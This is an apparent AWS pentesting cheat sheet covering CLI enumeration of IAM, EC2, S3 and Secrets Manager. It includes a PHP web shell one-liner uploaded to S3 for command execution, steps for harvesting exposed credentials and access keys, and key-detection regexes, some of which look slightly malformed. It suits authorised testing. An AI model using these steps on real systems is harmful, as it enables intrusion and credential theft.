AWS (Amazon Web Services) Pentesting

AWS (Amazon Web Services) provide on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered pay-as-you-go basis.

Amazon Resource Names (ARNs)

# Format
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>


Identify and Access Management (IAM)

# Add credentials
# This will add entries to .aws/config or .aws/credentials in user's home directory.
# <profile-name> is arbitrary.
aws configure --profile <profile-name>

# List credentials
aws configure list --profile <profile-name>


# Find the account id belonging to an access key (access key starts with "AKIA")
aws sts get-access-key-info --access-key-id AKIAQ31B...

# Determin the username the access key you're using belogns to
aws sts get-caller-identity --profile <profile-name>

# List all EC2 instances running in an account
aws ec2 describe-instances --output text --profile <profile-name>

# List all EC2 instances running in an account in a dirrerent region
aws ec2 describe-instances --output text --region us-east-1 --profile <profile-name>


Amazon S3

A public cloud storage resource available in Amazon Web Services (AWS) Simple Storage Service (S3), an object storage offering.

  1. S3 Bucket URLs Commonly Used

    If you find images in target website, open the images new tab and check the URLs if they're stored in Amazon S3.
    The following URLs templates are often used.

    http://example-assets.s3.amazonaws.com
    http://s3.amazonaws.com/example-assets/

    http://example-www.s3.amazonaws.com
    http://s3.amazonaws.com/example-www/

    http://example-public.s3.amazonaws.com
    http://s3.amazonaws.com/example-public/

    http://example-private.s3.amazonaws.com
    http://s3.amazonaws.com/example-private/

    http://example-bucket-zero.s3.amazonaws.com
    http://s3.amazonaws.com/example-bucket-zero/

    http://example-bucket-one.s3.amazonaws.com
    http://s3.amazonaws.com/example-bucket-one/

    http://example-bucket-two.s3.amazonaws.com
    http://s3.amazonaws.com/example-bucket-two/
  1. XML Content Discovery

    Accessing the S3 Bucket URL, if the contents of XML,

    ...
    <Contents>
    <Key>creds.txt</Key>
    ...
Retrieve the content by accessing to URL like https://vulnerable-assets.s3.amazonaws.com/creds.txt.
  1. AWS CLI

    First off, you may need to configure aws.

    aws configure
    # http://<bucket-name>.s3.amazonaws.com

    # List contents of a bucket
    aws s3 ls s3://<bucket-name>/
    aws s3 ls s3://<bucket-name>/ --no-sign-request
    aws s3 ls s3://example.com

    # Specify the endpoint
    aws s3 --endpoint=http://example.com ls s3://example.com

    # Download files from s3
    aws s3 cp s3://<bucket-name>/example.xml .

    # Upload files to s3
    aws s3 cp ./example.txt s3://<bucket-name>

    # --------------------------------------------------------------

    # List all S3 buckets in the AWS account you've added.
    aws s3 ls --profile PROFILENAME
  1. Web Shell/Reverse Shell with CLI

    1. Prepare Web Shell
        echo '<?php system($_GET["cmd"]); ?>' > shell.php
    
    1. Upload the Web Shell
        aws s3 cp ./shell.php s3://example.com
        # or
        aws s3 --endpoint=http://s3.example.com cp ./shell.php s3://example.com
    
    Check if uploaded
    
        aws s3 ls s3://example.com
        # or
        aws s3 --endpoint=http://s3.example.com ls s3://example.com
    
    1. Execute Commands via Request

      Send request to http://example.com/shell.php?cmd=whoami in browser or using curl.


Secrets Manager

# List secrets
aws secretsmanager list-secrets --profile <profile-name>

# Get secret value
# "secret-id" is the Name of the SecretList when run 'list-secrets'.
aws secretsmanager get-secret-value --secret-id <secret-id> --profile <profile-name>


# Help
aws secretsmanager help


Get Access Keys From Files

# Access Key ID starts with "AKIA"
grep -e AKIA ./*

Search AWS urls,keys in response body

Regex

AMAZON_URL: ```https?://[^\"\\'> ]```

AMAZON_URL_1: ```[a-z0-9.-]+\.s3-[a-z0-9-]\\.amazonaws\.com```

AMAZON_URL_2: ```[a-z0-9.-]+\.s3-website[.-](eu|ap|us|ca|sa|cn)```

AMAZON_URL_3: ```s3\\.amazonaws\.com/[a-z0-9._-]```

AMAZON_URL_4: ```s3-[a-z0-9-]+\.amazonaws\\.com/[a-z0-9._-]```

URLS: ```https?://[^\"\\'> ]```

AMAZON_KEY: ```([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}```

UPLOAD_FIELDS: ```<input[^>]\stype=[\"']?file[\"']?```